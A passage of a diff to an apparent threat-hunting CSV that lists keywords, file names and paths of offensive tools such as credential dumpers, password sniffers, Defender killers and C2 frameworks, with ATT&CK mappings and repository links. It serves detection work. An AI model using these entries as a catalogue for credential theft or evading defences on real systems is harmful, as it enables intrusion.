"*tecknicaltom/dsniff*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*Teensypreter.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*telegram2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*telegram2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*TelegramRAT-main*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" "*temp*\pp.exe*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*temp*KillDefender*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*temp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*temp*whoami.txt*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*Temp\dumpert*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*temp\stager.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*temp*whoami.txt*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Temp\dumpert*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*temp\stager.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*templates*CSExec.cs*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*templates*HIPS_LIPS_processes.txt*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*templates*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*tenable.com/downloads/nessus*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Terminating Windows Defender?*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*test.endpoint.rapid7.com*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*test_beef_debugs_spec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*test_ccache_fromKirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*test_crawler.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*test_beef_debugs_spec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*test_ccache_fromKirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*test_crawler.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*test_invoke_bof.x64.o*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*test_litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" -"*test_lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*test_lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*test_mitm_initialization.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" "*test_nanodump_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*test_pacu_update.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*test_tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*TestConsoleApp_YSONET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*test_pacu_update.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*test_tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TestConsoleApp_YSONET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*Test-ContainsAmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Test-DllExists*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Test-DllExists*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Test-DllExists*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*tester@egress-assess.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*testHeapOverflow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Test-HijackableDll*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*testing* testing* 1* 2* 3 *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*testHeapOverflow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Test-HijackableDll*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*testing* testing* 1* 2* 3 *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*Test-ServiceDaclPermission*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Test-ServiceDaclPermission*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Test-ServiceDaclPermission*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*TestWinRMMachines*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*tevora-threat/SharpView/*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*text_to_shellcode\*.exe*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","","N/A","","","" -"*TexttoExe.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TexttoExe.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*tgscrack.go*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*tgsrepcrack.*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential 